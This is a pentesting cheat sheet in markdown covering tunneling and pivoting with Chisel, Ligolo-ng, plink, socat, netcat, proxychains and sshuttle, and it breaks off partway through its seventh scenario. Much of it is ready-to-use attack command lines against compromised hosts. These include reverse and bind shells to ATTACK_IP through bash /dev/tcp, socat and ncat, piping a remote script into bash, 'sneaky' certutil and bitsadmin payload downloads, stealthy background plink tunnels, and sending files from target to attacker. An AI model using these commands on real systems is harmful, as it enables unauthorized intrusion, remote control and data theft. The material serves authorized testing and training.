tunneling-tools.md (36059B)
1 --- 2 title: "Tunneling Tools" 3 description: "Chisel, socat, plink and SSH tunneling patterns for port forwarding and pivoting through hosts." 4 category: tunneling-pivoting 5 tags: [pivoting, tunneling, port-forwarding] 6 tools: [Chisel, socat, plink, SSH] 7 difficulty: advanced 8 updated: "2026-08-09" 9 source: "vault:Misc/Tunneling.md" 10 --- 11 12 # Tunneling Tools Cheatsheet 13 14 ## Quick Reference Table 15 16 | Tool | Best For | Requires Root | Stealthy | Multi-Platform | 17 |------|----------|---------------|----------|----------------| 18 | **Ligolo-ng** | Full network pivoting | Only on attacker | High | ✅ | 19 | **Chisel** | Quick SOCKS proxy | No | Medium | ✅ | 20 | **SSHuttle** | VPN-like tunneling | Yes (attacker) | High | Linux/Mac | 21 | **Plink** | Windows SSH tunneling | No | High | Windows only | 22 | **Socat** | Port forwarding/relays | No | High | Linux/Windows | 23 | **Netcat** | Simple port forwarding | No | Medium | ✅ | 24 | **Proxychains** | Route tools via proxy | No | N/A | Linux/Mac | 25 26 ## Installed Tools Location 27 ``` 28 tunneling-tools/ 29 ├── chisel/ # TCP/UDP tunnel over HTTP (Fast SOCKS proxy) 30 ├── ligolo-ng/ # Advanced TUN-based tunneling (VPN-like, no SOCKS needed!) 31 ├── plink/ # SSH client for Windows (PuTTY Link) 32 ├── socat/ # Multipurpose relay (Port forwarding, shell upgrades) 33 ├── nc/ # Netcat (ncat) - Classic networking swiss army knife 34 ├── proxychains/ # Route tools through SOCKS/HTTP proxies (Install via brew) 35 └── sshuttle/ # VPN over SSH (Install via brew) 36 ``` 37 38 --- 39 40 ## CHISEL 41 **Best for:** Quick SOCKS proxy setup, HTTP-based tunneling (bypasses restrictive firewalls) 42 43 ### Start Server (Attack Box) 44 ```bash 45 # macOS (Apple Silicon) 46 ./chisel/macos/chisel_darwin_arm64 server -p 8080 --reverse 47 48 # macOS (Intel) 49 ./chisel/macos/chisel_darwin_amd64 server -p 8080 --reverse 50 51 # Linux 52 ./chisel/linux/chisel_linux_amd64 server -p 8080 --reverse 53 54 # With authentication (recommended) 55 ./chisel server -p 8080 --reverse --auth user:password 56 57 # Verbose mode (see connections) 58 ./chisel server -p 8080 --reverse -v 59 ``` 60 61 ### Connect Client (Target) 62 ```bash 63 # Linux - Reverse SOCKS proxy 64 ./chisel_linux_amd64 client ATTACK_IP:8080 R:1080:socks 65 66 # Windows - Reverse SOCKS proxy 67 chisel_windows_amd64.exe client ATTACK_IP:8080 R:1080:socks 68 69 # With authentication 70 ./chisel client --auth user:password ATTACK_IP:8080 R:1080:socks 71 72 # Multiple port forwards 73 ./chisel client ATTACK_IP:8080 R:1080:socks R:8888:localhost:80 R:3389:10.10.10.5:3389 74 ``` 75 76 ### Common Chisel Patterns 77 ```bash 78 # Reverse SOCKS (most common - access target's network from attacker) 79 chisel client ATTACK_IP:8080 R:1080:socks 80 81 # Forward specific port (expose target's service on attacker) 82 chisel client ATTACK_IP:8080 R:8888:127.0.0.1:80 83 84 # Local SOCKS (less common - access attacker's network from target) 85 chisel client ATTACK_IP:8080 1080:socks 86 87 # Remote forward with specific bind address 88 chisel client ATTACK_IP:8080 R:0.0.0.0:9999:localhost:80 89 ``` 90 91 ### Usage with Proxychains 92 ```bash 93 # After establishing SOCKS proxy on port 1080 94 proxychains4 nmap -sT -Pn 10.10.10.0/24 95 proxychains4 curl http://internal-server 96 proxychains4 firefox # Browse internal web apps 97 ``` 98 99 --- 100 101 ## LIGOLO-NG 102 **Best for:** Full network pivoting without SOCKS, TUN-based (works like a VPN), automatic routing 103 104 ### Setup TUN Interface (Attack Box - One Time Setup) 105 106 #### Linux 107 ```bash 108 sudo ip tuntap add user $(whoami) mode tun ligolo 109 sudo ip link set ligolo up 110 ``` 111 112 #### macOS 113 ```bash 114 # Install tuntaposx if needed 115 brew install --cask tuntap 116 117 # Create interface (done automatically by ligolo-ng on macOS) 118 ``` 119 120 #### Windows 121 ```powershell 122 # Ligolo-ng handles TUN interface automatically on Windows 123 # Run as Administrator 124 ``` 125 126 ### Start Proxy (Attack Box) 127 ```bash 128 # Linux 129 ./ligolo-ng/linux/proxy -selfcert -laddr 0.0.0.0:11601 130 131 # macOS 132 ./ligolo-ng/macos/proxy -selfcert -laddr 0.0.0.0:11601 133 134 # With custom certificate 135 ./proxy -certfile server.crt -keyfile server.key -laddr 0.0.0.0:11601 136 137 # Enable autoroute (automatically adds routes - v0.8+) 138 ./proxy -selfcert -laddr 0.0.0.0:11601 -autoroute 139 140 # With Web UI (multiplayer mode - v0.8+) 141 ./proxy -selfcert -laddr 0.0.0.0:11601 -api 127.0.0.1:8080 142 ``` 143 144 ### Connect Agent (Target) 145 ```bash 146 # Linux 147 ./agent -connect ATTACK_IP:11601 -ignore-cert 148 149 # Windows 150 agent.exe -connect ATTACK_IP:11601 -ignore-cert 151 152 # With specific network interface 153 ./agent -connect ATTACK_IP:11601 -ignore-cert -bind 192.168.1.10 154 155 # Retry connection on failure 156 ./agent -connect ATTACK_IP:11601 -ignore-cert -retry 157 ``` 158 159 ### Ligolo Console Commands 160 ``` 161 # Session management 162 session # List all connected sessions 163 session <id> # Select a session 164 info # Show session info 165 166 # Network discovery 167 ifconfig # Show target's network interfaces 168 listener_list # Show active listeners 169 170 # Tunneling 171 start # Start the tunnel 172 stop # Stop the tunnel 173 174 # Port forwarding (reverse - opens port on target) 175 listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4444 176 listener_add --addr 10.10.10.5:80 --to 192.168.1.100:8080 177 listener_stop <id> # Stop a listener 178 179 # Remote agent control 180 agent_kill # Remotely terminate the agent 181 ``` 182 183 ### Add Routes (Attack Box) 184 185 #### Linux 186 ```bash 187 # Add route for internal network 188 sudo ip route add 10.10.10.0/24 dev ligolo 189 190 # Add multiple routes 191 sudo ip route add 172.16.0.0/16 dev ligolo 192 sudo ip route add 192.168.50.0/24 dev ligolo 193 194 # View routes 195 ip route | grep ligolo 196 ``` 197 198 #### macOS 199 ```bash 200 # Add route 201 sudo route add -net 10.10.10.0/24 -interface utun 202 # Note: utun interface number may vary (utun5, utun6, etc.) 203 # Check with: ifconfig | grep utun 204 205 # Delete route 206 sudo route delete 10.10.10.0/24 207 ``` 208 209 #### Windows 210 ```powershell 211 # Add route 212 route add 10.10.10.0 mask 255.255.255.0 10.0.0.1 213 214 # View routes 215 route print 216 ``` 217 218 ### Complete Workflow Example 219 ```bash 220 # 1. Start proxy on attacker 221 ./proxy -selfcert -laddr 0.0.0.0:11601 -autoroute 222 223 # 2. Run agent on compromised host 224 ./agent -connect ATTACKER_IP:11601 -ignore-cert 225 226 # 3. In ligolo console 227 ligolo-ng » session # See connected agent 228 ligolo-ng » session 1 # Select the agent 229 [Agent] ligolo-ng » ifconfig # View target networks 230 [Agent] ligolo-ng » start # Start tunnel 231 232 # 4. Add routes (if not using autoroute) 233 sudo ip route add 172.16.5.0/24 dev ligolo 234 235 # 5. Access internal network directly 236 nmap -sT -Pn 172.16.5.0/24 # No proxychains needed! 237 ssh user@172.16.5.10 238 curl http://172.16.5.50:8080 239 ``` 240 241 ### Double Pivoting (Pivot through multiple networks) 242 ```bash 243 # Network topology: Attacker -> Host1 -> Host2 -> Target Network 244 245 # 1. Setup pivot on Host1 246 ./agent -connect ATTACKER_IP:11601 -ignore-cert 247 248 # 2. From attacker, add route to Host1's network 249 sudo ip route add 192.168.100.0/24 dev ligolo 250 251 # 3. Setup listener on Host1 for Host2 to connect back 252 listener_add --addr 192.168.100.50:11601 --to ATTACKER_IP:11601 253 254 # 4. From Host2, connect through Host1 255 ./agent -connect 192.168.100.50:11601 -ignore-cert 256 257 # 5. Add route to Host2's network 258 sudo ip route add 10.20.30.0/24 dev ligolo 259 ``` 260 261 --- 262 263 ## PLINK (Windows SSH Client) 264 **Best for:** SSH tunneling from Windows targets (no installation needed, single executable) 265 266 ### Prerequisites 267 ```bash 268 # On attack box, enable SSH password authentication 269 sudo vim /etc/ssh/sshd_config 270 # Set: PasswordAuthentication yes 271 sudo systemctl restart sshd 272 273 # Create user for tunneling 274 sudo useradd -m tunneluser 275 sudo passwd tunneluser 276 ``` 277 278 ### Reverse SSH Tunnel (Expose target service on attacker) 279 ```cmd 280 # Expose target's localhost:80 on attacker's port 9999 281 plink.exe -R 9999:127.0.0.1:80 user@ATTACK_IP -pw password 282 283 # Expose target's RDP to attacker 284 plink.exe -R 3389:127.0.0.1:3389 user@ATTACK_IP -pw password 285 286 # Expose internal network service 287 plink.exe -R 8080:10.10.10.50:80 user@ATTACK_IP -pw password 288 289 # Background execution (no window) 290 plink.exe -ssh -N -R 9999:127.0.0.1:80 user@ATTACK_IP -pw password 291 ``` 292 293 ### Dynamic SOCKS Proxy (Access target's network from attacker) 294 ```cmd 295 # Creates SOCKS proxy on attacker's port 1080 296 plink.exe -D 1080 user@ATTACK_IP -pw password 297 298 # Headless mode 299 plink.exe -N -D 1080 user@ATTACK_IP -pw password 300 ``` 301 302 ### Local Port Forward (Access attacker's service from target) 303 ```cmd 304 # Forward local 8080 to internal service 305 plink.exe -L 8080:INTERNAL_IP:80 user@ATTACK_IP -pw password 306 307 # Access attacker's tool on target 308 plink.exe -L 9001:ATTACK_IP:9001 user@ATTACK_IP -pw password 309 ``` 310 311 ### Persistence & Stealth 312 ```cmd 313 # Run in background (no console) 314 start /B plink.exe -N -R 9999:127.0.0.1:80 user@ATTACK_IP -pw password 315 316 # Auto-accept host key (first connection) 317 echo y | plink.exe -R 9999:127.0.0.1:80 user@ATTACK_IP -pw password 318 319 # Using SSH key instead of password 320 plink.exe -i private_key.ppk -R 9999:127.0.0.1:80 user@ATTACK_IP 321 ``` 322 323 --- 324 325 ## SOCAT 326 **Best for:** Port forwarding, shell upgrades, creating relays, encrypted tunnels 327 328 ### Basic Port Forwarding 329 ```bash 330 # Forward local 8080 to remote host (TCP) 331 ./socat_linux_x64 TCP-LISTEN:8080,fork TCP:TARGET_IP:80 332 333 # UDP port forward 334 ./socat_linux_x64 UDP-LISTEN:53,fork UDP:DNS_SERVER:53 335 336 # Bind to specific interface 337 ./socat_linux_x64 TCP-LISTEN:8080,bind=192.168.1.10,fork TCP:TARGET_IP:80 338 339 # IPv6 forwarding 340 socat TCP6-LISTEN:8080,fork TCP6:[fe80::1]:80 341 ``` 342 343 ### Reverse Shell Relay (Pivot through host) 344 ```bash 345 # On pivot host - relay connections to attacker 346 ./socat_linux_x64 TCP-LISTEN:4444,fork TCP:ATTACK_IP:4444 347 348 # Victim connects to pivot 349 bash -i >& /dev/tcp/PIVOT_IP/4444 0>&1 350 351 # Attacker receives shell 352 nc -lvnp 4444 353 ``` 354 355 ### TTY Shell Upgrade (Fully Interactive Shell) 356 ```bash 357 # Step 1: Attacker - prepare listener 358 socat file:`tty`,raw,echo=0 TCP-LISTEN:4444 359 360 # Step 2: Target - connect with PTY 361 ./socat_linux_x64 exec:'bash -li',pty,stderr,setsid,sigint,sane TCP:ATTACK_IP:4444 362 363 # Result: Full TTY with job control, tab completion, clear screen, etc. 364 ``` 365 366 ### Encrypted Tunnels (OpenSSL) 367 ```bash 368 # Generate certificate 369 openssl req -newkey rsa:2048 -nodes -keyout bind.key -x509 -days 365 -out bind.crt 370 cat bind.key bind.crt > bind.pem 371 372 # Listener (encrypted) 373 socat OPENSSL-LISTEN:4443,cert=bind.pem,verify=0,fork EXEC:/bin/bash 374 375 # Client (connect) 376 socat - OPENSSL:TARGET_IP:4443,verify=0 377 ``` 378 379 ### File Transfers 380 ```bash 381 # Sender 382 socat TCP-LISTEN:9999,reuseaddr FILE:file.zip 383 384 # Receiver 385 socat TCP:SENDER_IP:9999 CREATE:received.zip 386 ``` 387 388 ### Port Scanning with Socat 389 ```bash 390 # Simple port check 391 socat - TCP:TARGET:80,connect-timeout=1 392 393 # Banner grabbing 394 echo "" | socat - TCP:TARGET:22,connect-timeout=1 395 ``` 396 397 ### Creating Reverse Shells 398 ```bash 399 # Bind shell (target) 400 socat TCP-LISTEN:5555,reuseaddr,fork EXEC:/bin/bash,pty,stderr,setsid,sigint,sane 401 402 # Reverse shell (target to attacker) 403 socat EXEC:/bin/bash TCP:ATTACK_IP:4444 404 405 # Windows reverse shell 406 socat TCP:ATTACK_IP:4444 EXEC:'cmd.exe',pipes 407 ``` 408 409 --- 410 411 ## NETCAT (NCAT) 412 **Best for:** Quick port forwarding, simple relays, port scanning, basic file transfers 413 414 ### Basic Port Forwarding 415 ```bash 416 # Simple TCP relay (pivot) 417 mkfifo /tmp/f; cat /tmp/f | nc TARGET_IP 80 | nc -l -p 8080 > /tmp/f 418 419 # Persistent relay (using while loop) 420 while true; do nc -l -p 8080 -c "nc TARGET_IP 80"; done 421 ``` 422 423 ### Reverse Shell Relay 424 ```bash 425 # On pivot host - relay to attacker 426 mkfifo /tmp/f; nc ATTACK_IP 4444 < /tmp/f | nc -l -p 9999 > /tmp/f 427 428 # Victim connects to pivot:9999 429 # Attacker gets shell on 4444 430 ``` 431 432 ### File Transfers 433 ```bash 434 # Receiver (start first) 435 ./ncat_linux_x64 -l -p 9999 > received_file.zip 436 437 # Sender 438 ./ncat_linux_x64 TARGET_IP 9999 < file.zip 439 440 # With progress (using pv) 441 pv file.zip | nc TARGET_IP 9999 442 ``` 443 444 ### Port Scanning 445 ```bash 446 # Check single port 447 nc -zv TARGET_IP 80 448 449 # Scan range 450 nc -zv TARGET_IP 20-25 451 452 # Banner grabbing 453 echo "" | nc -v -n -w1 TARGET_IP 22 454 ``` 455 456 ### Creating Backdoors 457 ```bash 458 # Bind shell (target) 459 ./ncat_linux_x64 -l -p 5555 -e /bin/bash 460 461 # Reverse shell (target to attacker) 462 ./ncat_linux_x64 ATTACK_IP 4444 -e /bin/bash 463 464 # Windows reverse shell 465 ncat.exe ATTACK_IP 4444 -e cmd.exe 466 ``` 467 468 ### Chat/Communication Channel 469 ```bash 470 # Listener 471 nc -l -p 4444 472 473 # Client 474 nc TARGET_IP 4444 475 # Type messages, they appear on both sides 476 ``` 477 478 --- 479 480 ## PROXYCHAINS (Install Required) 481 **Best for:** Routing any tool through SOCKS/HTTP proxies (pairs well with Chisel/SSH) 482 483 ### Installation 484 ```bash 485 # macOS 486 brew install proxychains-ng 487 488 # Kali Linux / Debian / Ubuntu 489 sudo apt install proxychains4 -y 490 491 # Arch Linux 492 sudo pacman -S proxychains-ng 493 ``` 494 495 ### Config File Locations 496 ``` 497 # macOS (Homebrew) 498 /opt/homebrew/etc/proxychains.conf # Apple Silicon 499 /usr/local/etc/proxychains.conf # Intel Mac 500 501 # Linux 502 /etc/proxychains.conf # System-wide (older version) 503 /etc/proxychains4.conf # proxychains-ng (newer) 504 ~/.proxychains/proxychains.conf # User config (highest priority) 505 506 # Kali Linux 507 /etc/proxychains4.conf 508 ``` 509 510 ### Configuration Examples 511 ```bash 512 # Edit config file 513 sudo nano /etc/proxychains4.conf 514 515 # Basic SOCKS5 proxy (Chisel default) 516 [ProxyList] 517 socks5 127.0.0.1 1080 518 519 # SOCKS4 proxy 520 socks4 127.0.0.1 1080 521 522 # HTTP proxy 523 http 127.0.0.1 8080 524 525 # Chain multiple proxies 526 socks5 127.0.0.1 1080 527 socks5 10.10.10.5 1081 528 http 172.16.0.1 3128 529 530 # Proxy with authentication 531 socks5 127.0.0.1 1080 username password 532 ``` 533 534 ### Proxy Modes (in config file) 535 ```bash 536 # Dynamic chain (dead proxies auto-skipped) 537 dynamic_chain 538 539 # Strict chain (all proxies must work) 540 strict_chain 541 542 # Random chain (randomize proxy order) 543 random_chain 544 # random_chain = 2 # Use 2 random proxies from list 545 ``` 546 547 ### Common Usage 548 ```bash 549 # Nmap through proxy (use -sT for TCP connect scan) 550 proxychains4 nmap -sT -Pn 10.10.10.0/24 551 552 # SSH to internal host 553 proxychains4 ssh user@internal_host 554 555 # Web requests 556 proxychains4 curl http://internal-web 557 proxychains4 wget http://internal-site/file.zip 558 559 # Firefox browser (browse internal web apps) 560 proxychains4 firefox 561 562 # RDP through proxy 563 proxychains4 xfreerdp /v:10.10.10.5 /u:admin 564 565 # Metasploit through proxy 566 proxychains4 msfconsole 567 ``` 568 569 ### Quiet Mode (Suppress Proxychains Output) 570 ```bash 571 # Add to config file 572 quiet_mode 573 574 # Or use -q flag 575 proxychains4 -q nmap -sT 10.10.10.0/24 576 ``` 577 578 ### Custom Config File 579 ```bash 580 # Use specific config 581 proxychains4 -f /path/to/custom.conf curl http://target 582 583 # Example custom config 584 cat << EOF > /tmp/proxy.conf 585 strict_chain 586 quiet_mode 587 [ProxyList] 588 socks5 127.0.0.1 1080 589 EOF 590 591 proxychains4 -f /tmp/proxy.conf nmap -sT 10.10.10.5 592 ``` 593 594 ### DNS Configuration 595 ```bash 596 # In config file: 597 proxy_dns # Route DNS through proxy (default, recommended) 598 599 # Or disable: 600 #proxy_dns # Local DNS resolution 601 ``` 602 603 ### Troubleshooting 604 ```bash 605 # Test proxy connection 606 proxychains4 curl -I http://google.com 607 608 # Verbose mode (see all proxy operations) 609 # Comment out quiet_mode in config 610 611 # If "ERROR: ld.so: object 'libproxychains.so.3'" appears: 612 # Update config with correct lib path or reinstall proxychains 613 ``` 614 615 --- 616 617 ## SSHUTTLE (Install Required) 618 **Best for:** VPN-like tunneling over SSH (transparent proxying, no SOCKS needed!) 619 620 ### Installation 621 ```bash 622 # macOS 623 brew install sshuttle 624 625 # Kali Linux / Debian / Ubuntu 626 sudo apt install sshuttle -y 627 628 # Arch Linux 629 sudo pacman -S sshuttle 630 631 # Python pip 632 pip3 install sshuttle 633 ``` 634 635 ### Basic Usage 636 ```bash 637 # Route all private networks through pivot 638 sshuttle -r user@PIVOT_HOST 10.0.0.0/8 172.16.0.0/12 192.168.0.0/16 639 640 # Route specific subnet 641 sshuttle -r user@PIVOT_HOST 10.10.10.0/24 642 643 # Multiple subnets 644 sshuttle -r user@PIVOT_HOST 10.10.10.0/24 192.168.1.0/24 645 646 # Route everything (0/0) - careful! 647 sshuttle -r user@PIVOT_HOST 0/0 648 ``` 649 650 ### Advanced Options 651 ```bash 652 # Exclude specific hosts/networks 653 sshuttle -r user@PIVOT_HOST 10.10.10.0/24 -x PIVOT_HOST -x 10.10.10.50 654 655 # Use SSH key 656 sshuttle -r user@PIVOT_HOST -e 'ssh -i /path/to/key' 10.10.10.0/24 657 658 # Specify SSH port 659 sshuttle -r user@PIVOT_HOST:2222 10.10.10.0/24 660 661 # Verbose mode (see connections) 662 sshuttle -r user@PIVOT_HOST 10.10.10.0/24 -vv 663 664 # DNS through tunnel 665 sshuttle -r user@PIVOT_HOST 10.10.10.0/24 --dns 666 667 # Auto detect and route all remote subnets 668 sshuttle -r user@PIVOT_HOST --auto-nets 669 670 # Exclude local DNS 671 sshuttle -r user@PIVOT_HOST 10.10.10.0/24 --dns --to-ns=8.8.8.8 672 ``` 673 674 ### Daemon Mode (Background) 675 ```bash 676 # Run in background 677 sshuttle -r user@PIVOT_HOST 10.10.10.0/24 -D 678 679 # View sshuttle processes 680 ps aux | grep sshuttle 681 682 # Kill sshuttle 683 pkill sshuttle 684 ``` 685 686 ### Using Jump Hosts 687 ```bash 688 # SSH through jump host 689 sshuttle -r user@FINAL_HOST -e 'ssh -J user@JUMP_HOST' 10.10.10.0/24 690 691 # Multiple hops 692 sshuttle -r user@HOST3 -e 'ssh -J user@HOST1,user@HOST2' 10.10.10.0/24 693 ``` 694 695 ### Common Scenarios 696 ```bash 697 # Lab/CTF environment 698 sshuttle -r user@jump.lab.local 10.0.0.0/8 --dns -vv 699 700 # Pentest engagement (exclude your C2 server) 701 sshuttle -r user@pivot 10.10.0.0/16 -x YOUR_C2_IP 702 703 # Access cloud internal networks 704 sshuttle -r ubuntu@bastion.aws.com 10.0.0.0/16 172.31.0.0/16 705 706 # Through compromised host with SSH 707 sshuttle -r root@compromised-host 192.168.100.0/24 --no-latency-control 708 ``` 709 710 ### Troubleshooting 711 ```bash 712 # Check firewall rules added by sshuttle 713 sudo iptables -L -t nat # Linux 714 sudo pfctl -s all # macOS 715 716 # If connection drops 717 sshuttle -r user@HOST 10.10.10.0/24 --no-latency-control 718 719 # Manually clean up if sshuttle crashes 720 sudo pkill sshuttle 721 sudo iptables -t nat -F # Linux 722 sudo pfctl -F all # macOS 723 724 # Test connectivity 725 ping 10.10.10.5 # After sshuttle is running 726 curl http://10.10.10.50:80 727 ``` 728 729 ### Comparison with Other Tools 730 ``` 731 SSHuttle vs Ligolo-ng: 732 + Simpler (just needs SSH) 733 + No agent/binary on target 734 - Requires SSH access 735 - Slightly slower 736 737 SSHuttle vs Proxychains + Chisel: 738 + Transparent (no proxychains needed) 739 + Better performance 740 + Simpler to use 741 - Requires SSH 742 ``` 743 744 --- 745 746 ## Quick Transfer Commands 747 748 ### Start HTTP Server (Attacker) 749 ```bash 750 # Python3 (default) 751 python3 -m http.server 8000 752 753 # Python3 on specific interface 754 python3 -m http.server 8000 --bind 192.168.1.10 755 756 # Python2 757 python -m SimpleHTTPServer 8000 758 759 # PHP 760 php -S 0.0.0.0:8000 761 762 # Ruby 763 ruby -run -e httpd . -p 8000 764 765 # With authentication 766 python3 -m http.server 8000 --directory /path/to/files 767 ``` 768 769 ### Download on Target 770 771 #### Linux 772 ```bash 773 # wget 774 wget http://ATTACK_IP:8000/chisel_linux_amd64 -O /tmp/chisel && chmod +x /tmp/chisel 775 776 # curl 777 curl http://ATTACK_IP:8000/chisel_linux_amd64 -o /tmp/chisel && chmod +x /tmp/chisel 778 779 # curl with progress bar 780 curl -# http://ATTACK_IP:8000/file.zip -o /tmp/file.zip 781 782 # Download and execute in memory (be careful!) 783 curl http://ATTACK_IP:8000/script.sh | bash 784 785 # Using /dev/tcp if no tools available 786 cat < /dev/tcp/ATTACK_IP/8000 > /tmp/file 787 ``` 788 789 #### Windows PowerShell 790 ```powershell 791 # Invoke-WebRequest (PowerShell 3.0+) 792 Invoke-WebRequest -Uri http://ATTACK_IP:8000/chisel.exe -OutFile C:\Windows\Temp\chisel.exe 793 794 # Short alias 795 iwr -uri http://ATTACK_IP:8000/file.zip -o C:\Temp\file.zip 796 797 # WebClient (older PowerShell) 798 (New-Object System.Net.WebClient).DownloadFile("http://ATTACK_IP:8000/chisel.exe", "C:\Temp\chisel.exe") 799 800 # certutil (sneaky, no PowerShell) 801 certutil -urlcache -f http://ATTACK_IP:8000/chisel.exe C:\Temp\chisel.exe 802 803 # bitsadmin 804 bitsadmin /transfer myDownload /download /priority high http://ATTACK_IP:8000/file.exe C:\Temp\file.exe 805 ``` 806 807 #### Windows CMD 808 ```cmd 809 # PowerShell one-liner from CMD 810 powershell -c "Invoke-WebRequest -Uri 'http://ATTACK_IP:8000/file.exe' -OutFile 'C:\Temp\file.exe'" 811 812 # certutil 813 certutil.exe -urlcache -split -f http://ATTACK_IP:8000/file.exe C:\Temp\file.exe 814 ``` 815 816 ### Upload from Target to Attacker 817 818 #### Using Netcat 819 ```bash 820 # Attacker (receiver) 821 nc -lvnp 9999 > received_file.zip 822 823 # Target (sender) 824 cat file.zip | nc ATTACK_IP 9999 825 ``` 826 827 #### Using curl (POST) 828 ```bash 829 # Attacker (receiver with python) 830 python3 -m uploadserver 8000 831 832 # Target (sender) 833 curl -X POST http://ATTACK_IP:8000/upload -F 'files=@/path/to/file.zip' 834 ``` 835 836 ### SMB Transfer (Windows) 837 838 #### Setup SMB Server (Attacker - Linux) 839 ```bash 840 # Using impacket 841 impacket-smbserver share /path/to/share -smb2support 842 843 # With authentication 844 impacket-smbserver share /path/to/share -smb2support -username user -password pass 845 ``` 846 847 #### Access SMB Share (Target - Windows) 848 ```cmd 849 # List share 850 net view \\ATTACK_IP 851 852 # Copy from share 853 copy \\ATTACK_IP\share\chisel.exe C:\Temp\ 854 855 # Execute from share (no copy) 856 \\ATTACK_IP\share\chisel.exe 857 858 # Mount share 859 net use Z: \\ATTACK_IP\share 860 net use Z: \\ATTACK_IP\share /user:user pass 861 ``` 862 863 ### Base64 Transfer (Small Files) 864 ```bash 865 # Encode on attacker 866 base64 -w0 chisel > chisel.b64 867 868 # Decode on target (Linux) 869 echo "BASE64_STRING" | base64 -d > chisel && chmod +x chisel 870 871 # Decode on target (Windows PowerShell) 872 [System.Convert]::FromBase64String("BASE64_STRING") | Set-Content -Path chisel.exe -Encoding Byte 873 ``` 874 875 --- 876 877 ## Common Pentesting Scenarios 878 879 ### Scenario 1: Access Internal Network from Compromised DMZ Host 880 881 **Situation:** You compromised a Linux web server in DMZ (10.50.50.5), need to access internal network (192.168.10.0/24) 882 883 **Solution 1: Ligolo-ng (Best - No SOCKS needed)** 884 ```bash 885 # On attacker 886 ./ligolo-ng/linux/proxy -selfcert -laddr 0.0.0.0:11601 -autoroute 887 888 # On compromised DMZ host 889 ./agent -connect ATTACKER_IP:11601 -ignore-cert 890 891 # In ligolo console 892 session 1 893 start 894 895 # Add route (if autoroute not used) 896 sudo ip route add 192.168.10.0/24 dev ligolo 897 898 # Access internal network directly 899 nmap -sT 192.168.10.0/24 900 ``` 901 902 **Solution 2: Chisel + Proxychains (Fast to setup)** 903 ```bash 904 # On attacker 905 ./chisel server -p 8080 --reverse 906 907 # On DMZ host 908 ./chisel client ATTACKER_IP:8080 R:1080:socks 909 910 # On attacker 911 proxychains4 nmap -sT 192.168.10.5 912 ``` 913 914 ### Scenario 2: Windows Target with No Direct Outbound Access 915 916 **Situation:** Windows box can only reach another compromised Linux host (pivot), can't reach attacker directly 917 918 **Solution: Double Pivot with Chisel** 919 ```bash 920 # Step 1: Setup Chisel on first pivot (Linux) 921 ./chisel server -p 8080 --reverse 922 923 # Step 2: Windows connects to Linux pivot 924 chisel.exe client LINUX_PIVOT_IP:8080 R:1080:socks 925 926 # Step 3: On attacker, create another tunnel to reach Windows network via Linux pivot 927 ssh -L 9999:localhost:1080 user@LINUX_PIVOT_IP 928 929 # Step 4: Configure proxychains to use localhost:9999 930 # Then access Windows internal network 931 proxychains4 rdesktop INTERNAL_WINDOWS_IP 932 ``` 933 934 ### Scenario 3: Expose Internal Service to Attacker 935 936 **Situation:** Internal MSSQL server at 172.16.5.10:1433, want to connect from attacker 937 938 **Solution 1: Chisel Reverse Port Forward** 939 ```bash 940 # On attacker 941 ./chisel server -p 8080 --reverse 942 943 # On compromised internal host 944 ./chisel client ATTACKER_IP:8080 R:1433:172.16.5.10:1433 945 946 # On attacker, connect directly 947 mssqlclient.py sa:password@127.0.0.1:1433 948 ``` 949 950 **Solution 2: SSH Reverse Tunnel (if SSH available)** 951 ```bash 952 # From compromised host 953 ssh -R 1433:172.16.5.10:1433 user@ATTACKER_IP 954 955 # On attacker 956 mssqlclient.py sa:password@127.0.0.1:1433 957 ``` 958 959 ### Scenario 4: Port Forward Through Windows (No Custom Tools) 960 961 **Situation:** Compromised Windows server, need tunnel but can't upload tools 962 963 **Solution: Built-in Windows Port Forward (netsh)** 964 ```cmd 965 # Forward local port 8080 to internal service 966 netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=10.10.10.50 967 968 # View forwards 969 netsh interface portproxy show all 970 971 # Delete forward 972 netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0 973 ``` 974 975 ### Scenario 5: Multiple Nested Networks (3+ Hops) 976 977 **Situation:** Attacker -> Host A (10.10.10.5) -> Host B (192.168.1.10) -> Target Network (172.16.0.0/24) 978 979 **Solution: Ligolo-ng Listener Chaining** 980 ```bash 981 # Step 1: Connect Agent A to attacker 982 # On attacker 983 ./proxy -selfcert -laddr 0.0.0.0:11601 984 985 # On Host A 986 ./agent -connect ATTACKER_IP:11601 -ignore-cert 987 988 # Step 2: In ligolo console, create listener on Host A for Host B 989 session 1 990 listener_add --addr 0.0.0.0:11601 --to ATTACKER_IP:11601 991 start 992 993 # Step 3: Add route to Host A network 994 sudo ip route add 192.168.1.0/24 dev ligolo 995 996 # Step 4: From Host B, connect through Host A 997 ./agent -connect 192.168.1.10:11601 -ignore-cert 998 999 # Step 5: Select Host B session and add route 1000 session 2 1001 start 1002 sudo ip route add 172.16.0.0/24 dev ligolo 1003 1004 # Access final target network 1005 nmap 172.16.0.5 1006 ``` 1007 1008 ### Scenario 6: Catch Reverse Shell Through Tunnel 1009 1010 **Situation:** Need to catch a reverse shell from internal network host (no direct route) 1011 1012 **Solution: Ligolo-ng Listener (Reverse Port Forward)** 1013 ```bash 1014 # Setup tunnel to internal network (as usual) 1015 ./proxy -selfcert -laddr 0.0.0.0:11601 1016 ./agent -connect ATTACKER_IP:11601 -ignore-cert 1017 1018 # In ligolo console, setup listener 1019 session 1 1020 listener_add --addr 0.0.0.0:4444 --to 127.0.0.1:4444 1021 start 1022 1023 # On attacker, setup nc listener 1024 nc -lvnp 4444 1025 1026 # On target internal host, execute reverse shell to agent's IP 1027 bash -i >& /dev/tcp/AGENT_IP/4444 0>&1 1028 1029 # Shell appears on attacker's nc listener! 1030 ``` 1031 1032 ### Scenario 7: Access Internal Web Application 1033 1034 **Situation:** Internal web app at http://intranet.local (192.168.5.50:80), want to browse from attacker 1035 1036 **Solution 1: Ligolo-ng (Direct Access)** 1037 ```bash 1038 # Setup tunnel 1039 ./proxy -selfcert -laddr 0.0.0.0:11601 -autoroute 1040 ./agent -connect ATTACKER_IP:11601 -ignore-cert 1041 1042 # Start tunnel 1043 session 1; start 1044 1045 # Add to /etc/hosts 1046 echo "192.168.5.50 intranet.local" | sudo tee -a /etc/hosts 1047 1048 # Browse directly 1049 firefox http://intranet.local 1050 ``` 1051 1052 **Solution 2: Chisel + Browser SOCKS Proxy** 1053 ```bash 1054 # Setup chisel 1055 ./chisel server -p 8080 --reverse 1056 ./chisel client ATTACKER_IP:8080 R:1080:socks 1057 1058 # Configure Firefox SOCKS proxy: 1059 